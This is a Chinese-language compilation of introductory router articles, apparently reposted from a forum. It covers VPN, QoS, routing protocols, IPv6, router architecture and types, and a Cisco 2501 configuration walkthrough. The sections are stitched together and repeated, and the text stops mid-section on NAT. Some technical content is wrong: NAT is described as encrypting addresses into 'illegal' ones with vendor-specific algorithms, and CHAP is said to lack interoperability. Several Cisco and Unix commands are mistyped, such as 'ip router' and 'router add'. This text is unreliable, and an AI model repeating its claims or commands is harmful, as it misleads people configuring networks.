路由器的基本协议与技术

《一键清理系统垃圾》

路由器的基本协议与技术

    VPN
    VPN（Virtual Private Network-虚拟专用网）解决方案是路由器具有的重要功能之一。其解决方案大致如下：
    1．访问控制
    一般分为PAP（口令认证协议）和CHAP（高级口令认证协议）两种协议。PAP要求登录者向目标路由器提供用户名和口令，与其访问列表（Access List）中的信息相符才允许其登录。它虽然提供了一定的安全保障，但用户登录信息在网上无加密传递，易被人窃取。CHAP便应运而生，它把一随机初始值与用户原始登录信息（用户名和口令）经Hash算法翻译后形成新的登录信息。这样在网上传递的用户登录信息对黑客来说是不透明的，且由于随机初始值每次不同，用户每次的最终登录信息也会不同，即使某一次用户登录信息被窃取，黑客也不能重复使用。需要注意的是，由于各厂商采取各自不同的Hash算法，所以CHAP无互操作性可言。要建立VPN需要VPN两端放置相同品牌路由器。
    2．数据加密
    在加密过程中加密位数是一个很重要的参数，它直接关系到解密的难易程度，其中Intel 9000系列路由器表现最为优异，为一百多位加密。
    3．NAT（Network Address Translation-网络地址转换协议）
    如同用户登录信息一样，IP和MAC地址在网上无加密传递也很不安全。NAT可把合法IP地址和MAC地址翻译成非法IP地址和MAC地址在网上传递，到达目标路由器后反翻译成合法IP与MAC地址，这一过程有点像CHAP，翻译算法厂商各自有不同标准，不能实现互操作。
    QoS
    QoS（Quality of Service-服务质量）本来是ATM（Asynchronous Transmit Mode）中的专用术语，在IP上原来是不谈QoS的，但利用IP传VOD等多媒体信息的应用越来越多，IP作为一个打包的协议显得有点力不从心：延迟长且不为定值，丢包造成信号不连续且失真大。为解决这些问题，厂商提供了若干解决方案：第一种方案是基于不同对象的优先级，某些设备（多为多媒体应用）发送的数据包可以后到先传。第二种方案基于协议的优先级，用户可定义哪种协议优先级高，可后到先传，Intel和Cisco都支持。第三种方案是做链路整合MLPPP（Multi Link Point to Point Protocol），Cisco支持可通过将连接两点的多条线路做带宽汇聚，从而提高带宽。第四种方案是做资源预留RSVP（Resource Reservation Protocol），它将一部分带宽固定的分给多媒体信号，其它协议无论如何拥挤，也不得占用这部分带宽。这几种解决方案都能有效的提高传输质量。
    RIP、OSPF和BGP协议
    互联网上现在大量运行的路由协议有RIP（Routing Information Protocol-路由信息协议）、OSPF（Open Shortest Path First--开放式最短路优先）和BGP（Border Gateway Protocol—边界网关协议）。RIP、OSPF是内部网关协议，适用于单个ISP的统一路由协议的运行，由一个ISP运营的网络称为一个自治系统。BGP是自治系统间的路由协议，是一种外部网关协议。
    RIP是推出时间最长的路由协议，也是最简单的路由协议。它主要传递路由信息（路由表）来广播路由。每隔30秒，广播一次路由表，维护相邻路由器的关系，同时根据收到的路由表计算自己的路由表。RIP运行简单，适用于小型网络，互联网上还在部分使用着RIP。
    OSPF协议是“开放式最短路优先”的缩写。“开放”是针对当时某些厂家的“私有”路由协议而言，而正是因为协议开放性，才使得OSPF具有强大的生命力和广泛的用途。它通过传递链路状态（连接信息）来得到网络信息，维护一张网络有向拓扑图，利用最小生成树算法得到路由表。OSPF是一种相对复杂的路由协议。
    总的来说，OSPF、RIP都是自治系统内部的路由协议，适合于单一的ISP（自治系统）使用。一般说来，整个互联网并不适合跑单一的路由协议，因为各ISP有自己的利益，不愿意提供自身网络详细的路由信息。为了保证各ISP利益，标准化组织制定了ISP间的路由协议BGP。
    BGP处理各ISP之间的路由传递。其特点是有丰富的路由策略，这是RIP、OSPF等协议无法做到的，因为它们需要全局的信息计算路由表。BGP通过ISP边界的路由器加上一定的策略，选择过滤路由，把RIP、OSPF、BGP等的路由发送到对方。全局范围的、广泛的互联网是BGP处理多个ISP间的路由的实例。BGP的出现，引起了互联网的重大变革，它把多个ISP有机的连接起来，真正成为全球范围内的网络。带来的副作用是互联网的路由爆炸，现在互联网的路由大概是60000条，这还是经过“聚合”后的数字。 配置BGP需要对用户需求、网络现状和BGP协议非常了解，还需要非常小心，BGP运行在相对核心的地位，一旦出错，其造成的损失可能会很大！　　　　IPv6技术
    迅速发展中的互联网将不再是仅仅连接计算机的网络，它将发展成能同电话网、有线电视网类似的信息通信基础设施。因此，正在使用的IP（互联网协议）已经难以胜任，人们迫切希望下一代 IP即IPv6的出现。
    IPv6是IP的一种版本，在互联网通信协议TCP/IP中，是OSI模型第3层(网络层)的传输协议。它同目前广泛使用的、1974年便提出的IPv4相比，地址由32位扩充到128位。从理论上说，地址的数量由原先的4.3×109个增加到4.3×1038个。之所以必须从现行的IPv4改用IPv6，主要有二个原因。
    1．由于互联网迅速发展，地址数量已经不够用，这使得网络管理花费的精力和费用令人难以承受。地址的枯竭是促使向拥有128位地址空间过渡的首要原因。
    2．随着主机数目的增加，决定数据传输路由的路由表在不断加大。路由器的处理性能跟不上这种迅速增长。长此以往，互联网连接将难以提供稳定的服务。经由IPv6，路由数可以减少一个数量级。
    为了使互联网连接许多东西变得简单，而且使用容易，必须采用IPv6。IPv6所以能做到这一点，是因为它使用了四种技术:地址空间的扩充、可使路由表减小的地址构造、自动设定地址以及提高安全保密性。
    IPv6在路由技术上继承了IPv4的有利方面，代表未来路由技术的发展方向，许多路由器厂商目前已经投入很大力量以生产支持IPv6的路由器。当然IPv6也有一些值得注意和效率不高的地方，IPv4/NAT和IPv6将会共存相当长的一段时间。


路由器的结构

《一键清理系统垃圾》

路由器的结构

    路由器的体系结构
    从体系结构上看，路由器可以分为第一代单总线单CPU结构路由器、第二代单总线主从CPU结构路由器、第三代单总线对称式多CPU结构路由器；第四代多总线多CPU结构路由器、第五代共享内存式结构路由器、第六代交叉开关体系结构路由器和基于机群系统的路由器等多类。
    路由器的构成
    路由器具有四个要素：输入端口、输出端口、交换开关和路由处理器。
    输入端口是物理链路和输入包的进口处。端口通常由线卡提供，一块线卡一般支持4、8或16个端口，一个输入端口具有许多功能。第一个功能是进行数据链路层的封装和解封装。第二个功能是在转发表中查找输入包目的地址从而决定目的端口（称为路由查找），路由查找可以使用一般的硬件来实现，或者通过在每块线卡上嵌入一个微处理器来完成。第三，为了提供QoS（服务质量），端口要对收到的包分成几个预定义的服务级别。第四，端口可能需要运行诸如SLIP（串行线网际协议）和PPP（点对点协议）这样的数据链路级协议或者诸如PPTP（点对点隧道协议）这样的网络级协议。一旦路由查找完成，必须用交换开关将包送到其输出端口。如果路由器是输入端加队列的，则有几个输入端共享同一个交换开关。这样输入端口的最后一项功能是参加对公共资源（如交换开关）的仲裁协议。
    交换开关可以使用多种不同的技术来实现。迄今为止使用最多的交换开关技术是总线、交叉开关和共享存贮器。最简单的开关使用一条总线来连接所有输入和输出端口，总线开关的缺点是其交换容量受限于总线的容量以及为共享总线仲裁所带来的额外开销。交叉开关通过开关提供多条数据通路，具有N×N个交叉点的交叉开关可以被认为具有2N条总线。如果一个交叉是闭合，输入总线上的数据在输出总线上可用，否则不可用。交叉点的闭合与打开由调度器来控制，因此，调度器限制了交换开关的速度。在共享存贮器路由器中，进来的包被存贮在共享存贮器中，所交换的仅是包的指针，这提高了交换容量，但是，开关的速度受限于存贮器的存取速度。尽管存贮器容量每18个月能够翻一番，但存贮器的存取时间每年仅降低5%，这是共享存贮器交换开关的一个固有限制。
    输出端口在包被发送到输出链路之前对包存贮，可以实现复杂的调度算法以支持优先级等要求。与输入端口一样，输出端口同样要能支持数据链路层的封装和解封装，以及许多较高级协议。
    路由处理器计算转发表实现路由协议，并运行对路由器进行配置和管理的软件。同时，它还处理那些目的地址不在线卡转发表中的包。


路由器的类型

《一键清理系统垃圾》

路由器的类型

    互联网各种级别的网络中随处都可见到路由器。接入网络使得家庭和小型企业可以连接到某个互联网服务提供商；企业网中的路由器连接一个校园或企业内成千上万的计算机；骨干网上的路由器终端系统通常是不能直接访问的，它们连接长距离骨干网上的ISP和企业网络。互联网的快速发展无论是对骨干网、企业网还是接入网都带来了不同的挑战。骨干网要求路由器能对少数链路进行高速路由转发。企业级路由器不但要求端口数目多、价格低廉，而且要求配置起来简单方便，并提供QoS。
    1．接入路由器
    接入路由器连接家庭或ISP内的小型企业客户。接入路由器已经开始不只是提供SLIP或PPP连接，还支持诸如PPTP和IPSec等虚拟私有网络协议。这些协议要能在每个端口上运行。诸如ADSL等技术将很快提高各家庭的可用带宽，这将进一步增加接入路由器的负担。由于这些趋势，接入路由器将来会支持许多异构和高速端口，并在各个端口能够运行多种协议，同时还要避开电话交换网。
    2．企业级路由器
    企业或校园级路由器连接许多终端系统，其主要目标是以尽量便宜的方法实现尽可能多的端点互连，并且进一步要求支持不同的服务质量。许多现有的企业网络都是由Hub或网桥连接起来的以太网段。尽管这些设备价格便宜、易于安装、无需配置，但是它们不支持服务等级。相反，有路由器参与的网络能够将机器分成多个碰撞域，并因此能够控制一个网络的大小。此外，路由器还支持一定的服务等级，至少允许分成多个优先级别。但是路由器的每端口造价要贵些，并且在能够使用之前要进行大量的配置工作。因此，企业路由器的成败就在于是否提供大量端口且每端口的造价很低，是否容易配置，是否支持QoS。另外还要求企业级路由器有效地支持广播和组播。企业网络还要处理历史遗留的各种LAN技术，支持多种协议，包括IP、IPX和Vine。它们还要支持防火墙、包过滤以及大量的管理和安全策略以及VLAN。
    3．骨干级路由器
    骨干级路由器实现企业级网络的互联。对它的要求是速度和可靠性，而代价则处于次要地位。硬件可靠性可以采用电话交换网中使用的技术，如热备份、双电源、双数据通路等来获得。这些技术对所有骨干路由器而言差不多是标准的。骨干IP路由器的主要性能瓶颈是在转发表中查找某个路由所耗的时间。当收到一个包时，输入端口在转发表中查找该包的目的地址以确定其目的端口，当包越短或者当包要发往许多目的端口时，势必增加路由查找的代价。因此，将一些常访问的目的端口放到缓存中能够提高路由查找的效率。不管是输入缓冲还是输出缓冲路由器，都存在路由查找的瓶颈问题。除了性能瓶颈问题，路由器的稳定性也是一个常被忽视的问题。
    4．太比特路由器
    在未来核心互联网使用的三种主要技术中，光纤和DWDM都已经是很成熟的并且是现成的。如果没有与现有的光纤技术和DWDM技术提供的原始带宽对应的路由器，新的网络基础设施将无法从根本上得到性能的改善，因此开发高性能的骨干交换/路由器（太比特路由器）已经成为一项迫切的要求。太比特路由器技术现在还主要处于开发实验阶段。


路由器的配置与调试

《一键清理系统垃圾》

路由器的配置与调试

    路由器在计算机网络中有着举足轻重的地位，是计算机网络的桥梁。通过它不仅可以连通不同的网络，还能选择数据传送的路径，并能阻隔非法的访问。

    路由器的配置对初学者来说，并不是件十分容易的事。现将路由器的一般配置和简单调试介绍给大家，供朋友们在配置路由器时参考，本文以Cisco2501为例。

    Cisco2501有一个以太网口（AUI）、一个Console口（RJ45）、一个AUX口（RJ45）和两个同步串口，支持DTE和DCE设备，支持 EIA/TIA-232、 EIA/TIA-449、 V.35 、X.25和EIA-530接口。

    一．配置
    1．配置以太网端口

    # conf t（从终端配置路由器）

    # int e0（指定E0口）

    # ip addr ABCD XXXX（ABCD 为以太网地址，XXXX为子网掩码）

    # ip addr ABCD XXXX secondary（E0口同时支持两个地址类型。如果第一个为 A类地址，则第二个为B或C类地址）

    # no shutdown（激活E0口）

    # exit

    完成以上配置后，用ping命令检查E0口是否正常。如果不正常，一般是因为没有激活该端口，初学者往往容易忽视。用no shutdown命令激活E0口即可。

    2．X.25的配置

    # conf t

    # int S0（指定S0口）

    # ip addr ABCD XXXX（ABCD 为以太网S0 的IP地址，XXXX为子网掩码）

    # encap X25-ABC（封装X.25协议。ABC指定X.25为DTE或DCE操作，缺省为DTE）

    # x25 addr ABCD（ABCD为S0的X.25端口地址，由邮电局提供）

    # x25 map ip ABCD XXXX br（映射的X.25地址。ABCD为对方路由器（如：S0）的IP 地址，XXXX为对方路由器（如：S0）的X.25端口地址）

    # x25 htc X（配置最高双向通道数。X的取值范围1-4095，要根据 邮电局实际提供的数字配置）

    # x25 nvc X（配置虚电路数，X不可超过邮电局实际提供的数否则将影响数据的正常传输）

    # exit

    S0端口配置完成后，用no shutdown命令激活E0口。如果ping S0端口正常，ping 映射的X.25 IP地址即对方路由器端口IP地址不通，则可能是以下几种情况引起的：1）本机X.25地址配置错误，重新与邮局核对（X.25地址长度为13位）；2）本机映射IP地址或X.25地址配置错误，重新配置正确；3）对方IP地址或X.25地址配置错误；4）本机或对方路由配置错误。

    能够与对方通讯，但有丢包现象。出现这种情况，一般有以下几种可能：1）线路情况不好，或网卡、RJ45插头接触不良；2）x25 htc最高双向通道数X的取值范围和x25nvc 虚电路数X超出邮电局实际提供的数字。最高双向通道数和虚电路数这两个值越大越好，但绝对不能超出邮电局实际提供的数字，否则就会出现丢包现象。

    3．专线的配置

    # conf t

    # int　S2（指定S2口）

    # ip addr ABCD XXXX（ABCD 为S2 的IP地址，XXXX为子网掩码）

    # exit

    专线口配置完成后，用no shutdown命令激活S2口即可。

    4．帧中继的配置

    # conf t

    # int s0

    # ip addr ABCD XXXX （ABCD 为S0 的IP地址,XXXX为子网掩码）

    # encap frante_relay （封装frante_relay 协议）

    # no nrzi_encoding （NRZI=NO）

    # frame_relay lmi_type q933a （LMI使用Q933A标准．LMI（Local management Interface） 有3种：ANSI：T1.617、CCITTY：Q933A和Cisco特有的标准）

    # fram-relay intf-typ ABC（ABC为帧中继设备类型，它们分别是DTE设备、DCE交换机或NNI（网络接点接口）支持）

    # frame_relay interface_dlci 110 br（配置DLCI（数据链路连接标识符））

    # frame-relay map ip ABCD XXXX broadcast （建立帧中继映射。ABCD为对方IP地址，XXXX为本地DLCI号，broadcast允许广播向前转发或更新路由）

    # no shutdown （激活本端口）

    # exit

    帧中继S0端口配置完成后，用ping命令检查S0口。如果不正常，通常是因为没有激活该端口，用no shutdown命令激活S0口即可。如果ping S0端口正常，ping 映射的IP地址不正常，则可能是帧中继交换机或对方配置错误，需要综合排查。

    5．配置同步/异步口（适用于2522）

    # conf t

    # int s2

    # ph asyn （配置S2为异步口）

    # ph sync （配置S2为同步口）

    6．动态路由的配置

    # conf t

    # router eigrp 20 （使用EIGRP路由协议。常用的路由协议有RIP、IGRP、IS-IS等）

    # passive-interface serial0 （若S0与X.25相连，则输入本条指令）

    # passive-interface serial1 （若S1与X.25相连，则输入本条指令）

    # network ABCD （ABCD为本机的以太网地址）

    # network XXXX （XXXX为S0的IP地址）

    # no auto-summary

    # exit

    7．静态路由的配置

    # ip router ABCD XXXX YYYY 90 （ABCD为对方路由器的以太网地址，XXXX 为子网掩码，YYYY为对方对应的广域网端口地址）

    # dialer-list 1 protocol ip permail

    二． 综合调试
    当路由器全部配置完毕后，可进行一次综合调试。

    1．首先将路由器的以太网口和所有要使用的串口都激活。方法是进入该口，执行no shutdown。

    2．将和路由器相连的主机加上缺省路由（中心路由器的以太地址）。方法是在Unix系统的超级用户下执行：router add default XXXX 1（XXXX为路由器的E0口地址）。每台主机都要加缺省路由，否则，将不能正常通讯。

    3．ping本机的路由器以太网口，若不通，可能以太网口没有激活或不在一个网段上。ping广域网口，若不通，则没有加缺省路由。ping对方广域网口，若不通，路由器配置错误。ping主机以太网口，若不通，对方主机没有加缺省路由。

    4．在专线卡X.25主机上加网关（静态路由）。方法是在Unix系统的超级用户下执行：router add X.X.X.X Y.Y.Y.Y 1（X.X.X.X为对方以太网地址，Y.Y.Y.Y为对方广域网地址）。

    5．使用Tracert对路由进行跟踪，以确定不通网段。


路由器的作用

《一键清理系统垃圾》

路由器的作用

    路由器的一个作用是连通不同的网络，另一个作用是选择信息传送的线路。选择通畅快捷的近路，能大大提高通信速度，减轻网络系统通信负荷，节约网络系统资源，提高网络系统畅通率，从而让网络系统发挥出更大的效益来。
    从过滤网络流量的角度来看，路由器的作用与交换机和网桥非常相似。但是与工作在网络物理层，从物理上划分网段的交换机不同，路由器使用专门的软件协议从逻辑上对整个网络进行划分。例如，一台支持IP协议的路由器可以把网络划分成多个子网段，只有指向特殊IP地址的网络流量才可以通过路由器。对于每一个接收到的数据包，路由器都会重新计算其校验值，并写入新的物理地址。因此，使用路由器转发和过滤数据的速度往往要比只查看数据包物理地址的交换机慢。但是，对于那些结构复杂的网络，使用路由器可以提高网络的整体效率。路由器的另外一个明显优势就是可以自动过滤网络广播。从总体上说，在网络中添加路由器的整个安装过程要比即插即用的交换机复杂很多。
    一般说来，异种网络互联与多个子网互联都应采用路由器来完成。
    路由器的主要工作就是为经过路由器的每个数据帧寻找一条最佳传输路径，并将该数据有效地传送到目的站点。由此可见，选择最佳路径的策略即路由算法是路由器的关键所在。为了完成；这项工作，在路由器中保存着各种传输路径的相关数据——路径表（Routing Table），供路由选择；时使用。路径表中保存着子网的标志信息、网上路由器的个数和下一个路由器的名字等内容。路径表可以是由系统管理员固定设置好的，也可以由系统动态修改，可以由路由器自动调整，也可以由主机控制。
    1．静态路径表
    由系统管理员事先设置好固定的路径表称之为静态（static）路径表，一般是在系统安装时就根据网络的配置情况预先设定的，它不会随未来网络结构的改变而改变。
    2．动态路径表
    动态（Dynamic）路径表是路由器根据网络系统的运行情况而自动调整的路径表。路由器根据路由选择协议（Routing Protocol）提供的功能，自动学习和记忆网络运行情况，在需要时自动计算数据传输的最佳路径。


路由器在IP网络中的位置

《一键清理系统垃圾》

路由器在IP网络中的位置

整个IP网络由许多子网络构成，各子网络又由许多主机组成。子网内部的主机通信，由链路协议直接进行；子网之间的主机通信，要通过路由器来完成。路由器是多个子网的成员，在它的内部有一张表示Net ID与下一跳端口对应关系的路由表。通信起点主机发出IP包被路由器接收后，路由器查路由表，确定下一跳输出端口，发给下一台路由器，这台路由器又转发给另外一台路由器，用这样一跳接着一跳的方式，直到通信终点另一台主机收到这个IP包。
IP协议把网络划分为物理层（L1）、链路层（L2）、网络层（L3）、传输层（L4）及应用层（L7）五个层次。处理物理层的设备为集线器，处理链路层的设备为L2以太交换机，路由器是在网络层转发数据的设备。L3以太网交换机是IP网络路由器的特例，通常只有以太线路接口，工作在纯以太网络环境中。

路由器工作原理
路由表是工作在IP协议网络层实现子网之间转发数据的设备。路由器内部可以划分为控制平面和数据通道。在控制平面上，路由协议可以有不同的类型。路由器通过路由协议交换网络的拓扑结构信息，依照拓扑结构动态生成路由表。在数据通道上，转发引擎从输入线路接收IP包后，分析与修改包头，使用转发表查找输出端口，把数据交换到输出线路上。转发表是根据路由表生成的，其表项和路由表项有直接对应关系，但转发表的格式和路由表的格式不同，它更适合实现快速查找。转发的主要流程包括线路输入、包头分析、数据存储、包头修改和线路输出。
路由协议根据网络拓扑结构动态生成路由表。IP协议把整个网络划分为管理区域，这些管理区域称为自治域，自治域区号实行全网统一管理。这样，路由协议就有域内协议和域间协议之分。域内路由协议，如OSPF、IS-IS，在路由器间交换管理域内代表网络拓扑结构的链路状态，根据链路状态推导出路由表。域间路由协议相邻节点交换数据，不能使用多播方式，只能采用指定的点到点连接。

路由器结构体系
路由器的控制平面，运行在通用CPU系统中，多年来一直没有多少变化。在高可用性设计中，可以采用双主控进行主从式备份，来保证控制平面的可靠性。路由器的数据通道，为适应不同的线路速度，不同的系统容量，采用了不同的实现技术。 路由器的结构体系正是根据数据通道转发引擎的实现机理来区分。简单而言，可以分为软件转发路由器和硬件转发路由器。软件转发路由器使用CPU软件技术实现数据转发，根据使用CPU的数目，进一步区分为单CPU的集中式和多CPU的分布式。硬件转发路由器使用网络处理器硬件技术实现数据转发，根据使用网络处理器的数目及网络处理器在设备中的位置，进一步细分为单网络处理器的集中式、多网络处理器的负荷分担并行式和中心交换分布式。

路由器性能分析
路由器控制平面部分和数据通道部分对路由器的使用有着不同的影响。在数据通道上，IP报文处理能力主要受交换部件的有效带宽和转发部分的处理速度影响。交换带宽，用技术指标bps（比特/秒）来衡量，一般在纯大包的条件下测定。转发速度，用技术指标pps（包/秒）来衡量，一般在纯小包的条件下测定。软件转发单CPU路由器，交换带宽和转发能力为系统共享，线路卡个数不同，各线路卡会有不同的性能表现。软件转发多CPU路由器，转发能力有明显优势，交换带宽没有明显提高。硬件转发路由器，一般要针对线速进行设计，系统交换带宽大于各线路接口的总和，转发处理能力在纯小包的情形下也能胜任，区别的只是容量和价格。线速路由器，保证线路接口在各种情况下能够达到满速，这时候，是线路而非设备是网络的瓶颈。另外，IP业务，如ACL，NAT、IPSec等，是否造成性能下降，也是设计和使用路由器要考虑的问题。

在控制平面上，小型网络问题不大，只要支持选用的路由协议就可以了。对于大型网络，特别是有独立自治域号的运营商网络，在路由协议类型满足要求的情况下，应该考察路由表项大小是否满足、域间路由协议相邻节点的连接数目是否满足、路由表项更新速度如何、路由更新时对数据通道上的处理有无影响等等。


路由器基本知识

《一键清理系统垃圾》

路由器基本知识

所谓路由就是指通过相互连接的网络把信息从源地点移动到目标地点的活动。一般来说，在路由过程中，信息至少会经过一个或多个中间节点。通常，人们会把路由和交换进行对比，这主要是因为在普通用户看来两者所实现的功能是完全一样的。其实，路由和交换之间的主要区别就是交换发生在OSI参考模型的第二层（数据链路层），而路由发生在第三层，即网络层。这一区别决定了路由和交换在移动信息的过程中需要使用不同的控制信息，所以两者实现各自功能的方式是不同的。
    早在40多年之间就已经出现了对路由技术的讨论，但是直到80年代路由技术才逐渐进入商业化的应用。路由技术之所以在问世之初没有被广泛使用主要是因为80年代之前的网络结构都非常简单，路由技术没有用武之地。直到最近十几年，大规模的互联网络才逐渐流行起来，为路由技术的发展提供了良好的基础和平台。
    路由器是互联网的主要节点设备。路由器通过路由决定数据的转发。转发策略称为路由选择（routing），这也是路由器名称的由来（router，转发者）。作为不同网络之间互相连接的枢纽，路由器系统构成了基于 TCP/IP 的国际互连网络 Internet 的主体脉络，也可以说，路由器构成了 Internet 的骨架。它的处理速度是网络通信的主要瓶颈之一，它的可靠性则直接影响着网络互连的质量。因此，在园区网、地区网、乃至整个 Internet 研究领域中，路由器技术始终处于核心地位，其发展历程和方向，成为整个 Internet 研究的一个缩影。在当前我国网络基础建设和信息建设方兴未艾之际，探讨路由器在互连网络中的作用、地位及其发展方向，对于国内的网络技术研究、网络建设，以及明确网络市场上对于路由器和网络互连的各种似是而非的概念，都具有重要的意义。

  路由器的作用
路由器的一个作用是连通不同的网络，另一个作用是选择信息传送的线路。选择通畅快捷的近路，能大大提高通信速度，减轻网络系统通信负荷，节约网络系统资源，提高网络系统畅通率，从而让网络系统发挥出更大的效益来。
    从过滤网络流量的角度来看，路由器的作用与交换机和网桥非常相似。但是与工作在网络物理层，从物理上划分网段的交换机不同，路由器使用专门的软件协议从逻辑上对整个网络进行划分。例如，一台支持IP协议的路由器可以把网络划分成多个子网段，只有指向特殊IP地址的网络流量才可以通过路由器。对于每一个接收到的数据包，路由器都会重新计算其校验值，并写入新的物理地址。因此，使用路由器转发和过滤数据的速度往往要比只查看数据包物理地址的交换机慢。但是，对于那些结构复杂的网络，使用路由器可以提高网络的整体效率。路由器的另外一个明显优势就是可以自动过滤网络广播。从总体上说，在网络中添加路由器的整个安装过程要比即插即用的交换机复杂很多。
    一般说来，异种网络互联与多个子网互联都应采用路由器来完成。
    路由器的主要工作就是为经过路由器的每个数据帧寻找一条最佳传输路径，并将该数据有效地传送到目的站点。由此可见，选择最佳路径的策略即路由算法是路由器的关键所在。为了完成；这项工作，在路由器中保存着各种传输路径的相关数据——路径表（Routing Table），供路由选择；时使用。路径表中保存着子网的标志信息、网上路由器的个数和下一个路由器的名字等内容。路径表可以是由系统管理员固定设置好的，也可以由系统动态修改，可以由路由器自动调整，也可以由主机控制。
    1．静态路径表
    由系统管理员事先设置好固定的路径表称之为静态（static）路径表，一般是在系统安装时就根据网络的配置情况预先设定的，它不会随未来网络结构的改变而改变。
    2．动态路径表
    动态（Dynamic）路径表是路由器根据网络系统的运行情况而自动调整的路径表。路由器根据路由选择协议（Routing Protocol）提供的功能，自动学习和记忆网络运行情况，在需要时自动计算数据传输的最佳路径。
路由器的结构
路由器的体系结构
    从体系结构上看，路由器可以分为第一代单总线单CPU结构路由器、第二代单总线主从CPU结构路由器、第三代单总线对称式多CPU结构路由器；第四代多总线多CPU结构路由器、第五代共享内存式结构路由器、第六代交叉开关体系结构路由器和基于机群系统的路由器等多类。
    路由器的构成
    路由器具有四个要素：输入端口、输出端口、交换开关和路由处理器。
    输入端口是物理链路和输入包的进口处。端口通常由线卡提供，一块线卡一般支持4、8或16个端口，一个输入端口具有许多功能。第一个功能是进行数据链路层的封装和解封装。第二个功能是在转发表中查找输入包目的地址从而决定目的端口（称为路由查找），路由查找可以使用一般的硬件来实现，或者通过在每块线卡上嵌入一个微处理器来完成。第三，为了提供QoS（服务质量），端口要对收到的包分成几个预定义的服务级别。第四，端口可能需要运行诸如SLIP（串行线网际协议）和PPP（点对点协议）这样的数据链路级协议或者诸如PPTP（点对点隧道协议）这样的网络级协议。一旦路由查找完成，必须用交换开关将包送到其输出端口。如果路由器是输入端加队列的，则有几个输入端共享同一个交换开关。这样输入端口的最后一项功能是参加对公共资源（如交换开关）的仲裁协议。
    交换开关可以使用多种不同的技术来实现。迄今为止使用最多的交换开关技术是总线、交叉开关和共享存贮器。最简单的开关使用一条总线来连接所有输入和输出端口，总线开关的缺点是其交换容量受限于总线的容量以及为共享总线仲裁所带来的额外开销。交叉开关通过开关提供多条数据通路，具有N×N个交叉点的交叉开关可以被认为具有2N条总线。如果一个交叉是闭合，输入总线上的数据在输出总线上可用，否则不可用。交叉点的闭合与打开由调度器来控制，因此，调度器限制了交换开关的速度。在共享存贮器路由器中，进来的包被存贮在共享存贮器中，所交换的仅是包的指针，这提高了交换容量，但是，开关的速度受限于存贮器的存取速度。尽管存贮器容量每18个月能够翻一番，但存贮器的存取时间每年仅降低5%，这是共享存贮器交换开关的一个固有限制。
    输出端口在包被发送到输出链路之前对包存贮，可以实现复杂的调度算法以支持优先级等要求。与输入端口一样，输出端口同样要能支持数据链路层的封装和解封装，以及许多较高级协议。
    路由处理器计算转发表实现路由协议，并运行对路由器进行配置和管理的软件。同时，它还处理那些目的地址不在线卡转发表中的包。

--------------------------------------------------------------------------------
作者: sandywg　　时间: 2003-5-3 21:01　　 标题: 还是介绍基本知识先啊！！

LBHIDDEN[0]LBHIDDEN[这个贴子最后由shgengen在 2005/03/20 09:01am 第 1 次编辑]

路由器的类型互联网各种级别的网络中随处都可见到路由器。接入网络使得家庭和小型企业可以连接到某个互联网服务提供商；企业网中的路由器连接一个校园或企业内成千上万的计算机；骨干网上的路由器终端系统通常是不能直接访问的，它们连接长距离骨干网上的ISP和企业网络。互联网的快速发展无论是对骨干网、企业网还是接入网都带来了不同的挑战。骨干网要求路由器能对少数链路进行高速路由转发。企业级路由器不但要求端口数目多、价格低廉，而且要求配置起来简单方便，并提供QoS。
    1．接入路由器
    接入路由器连接家庭或ISP内的小型企业客户。接入路由器已经开始不只是提供SLIP或PPP连接，还支持诸如PPTP和IPSec等虚拟私有网络协议。这些协议要能在每个端口上运行。诸如ADSL等技术将很快提高各家庭的可用带宽，这将进一步增加接入路由器的负担。由于这些趋势，接入路由器将来会支持许多异构和高速端口，并在各个端口能够运行多种协议，同时还要避开电话交换网。
    2．企业级路由器
    企业或校园级路由器连接许多终端系统，其主要目标是以尽量便宜的方法实现尽可能多的端点互连，并且进一步要求支持不同的服务质量。许多现有的企业网络都是由Hub或网桥连接起来的以太网段。尽管这些设备价格便宜、易于安装、无需配置，但是它们不支持服务等级。相反，有路由器参与的网络能够将机器分成多个碰撞域，并因此能够控制一个网络的大小。此外，路由器还支持一定的服务等级，至少允许分成多个优先级别。但是路由器的每端口造价要贵些，并且在能够使用之前要进行大量的配置工作。因此，企业路由器的成败就在于是否提供大量端口且每端口的造价很低，是否容易配置，是否支持QoS。另外还要求企业级路由器有效地支持广播和组播。企业网络还要处理历史遗留的各种LAN技术，支持多种协议，包括IP、IPX和Vine。它们还要支持防火墙、包过滤以及大量的管理和安全策略以及VLAN。
    3．骨干级路由器
    骨干级路由器实现企业级网络的互联。对它的要求是速度和可靠性，而代价则处于次要地位。硬件可靠性可以采用电话交换网中使用的技术，如热备份、双电源、双数据通路等来获得。这些技术对所有骨干路由器而言差不多是标准的。骨干IP路由器的主要性能瓶颈是在转发表中查找某个路由所耗的时间。当收到一个包时，输入端口在转发表中查找该包的目的地址以确定其目的端口，当包越短或者当包要发往许多目的端口时，势必增加路由查找的代价。因此，将一些常访问的目的端口放到缓存中能够提高路由查找的效率。不管是输入缓冲还是输出缓冲路由器，都存在路由查找的瓶颈问题。除了性能瓶颈问题，路由器的稳定性也是一个常被忽视的问题。
    4．太比特路由器
    在未来核心互联网使用的三种主要技术中，光纤和DWDM都已经是很成熟的并且是现成的。如果没有与现有的光纤技术和DWDM技术提供的原始带宽对应的路由器，新的网络基础设施将无法从根本上得到性能的改善，因此开发高性能的骨干交换/路由器（太比特路由器）已经成为一项迫切的要求。太比特路由器技术现在还主要处于开发实验阶段。
路由器的基本协议与技术

    VPN
    VPN（Virtual Private Network-虚拟专用网）解决方案是路由器具有的重要功能之一。其解决方案大致如下：
    1．访问控制
    一般分为PAP（口令认证协议）和CHAP（高级口令认证协议）两种协议。PAP要求登录者向目标路由器提供用户名和口令，与其访问列表（Access List）中的信息相符才允许其登录。它虽然提供了一定的安全保障，但用户登录信息在网上无加密传递，易被人窃取。CHAP便应运而生，它把一随机初始值与用户原始登录信息（用户名和口令）经Hash算法翻译后形成新的登录信息。这样在网上传递的用户登录信息对黑客来说是不透明的，且由于随机初始值每次不同，用户每次的最终登录信息也会不同，即使某一次用户登录信息被窃取，黑客也不能重复使用。需要注意的是，由于各厂商采取各自不同的Hash算法，所以CHAP无互操作性可言。要建立VPN需要VPN两端放置相同品牌路由器。
    2．数据加密
    在加密过程中加密位数是一个很重要的参数，它直接关系到解密的难易程度，其中Intel 9000系列路由器表现最为优异，为一百多位加密。
    3．NAT（Network Address Translation-网络地址转换协议）
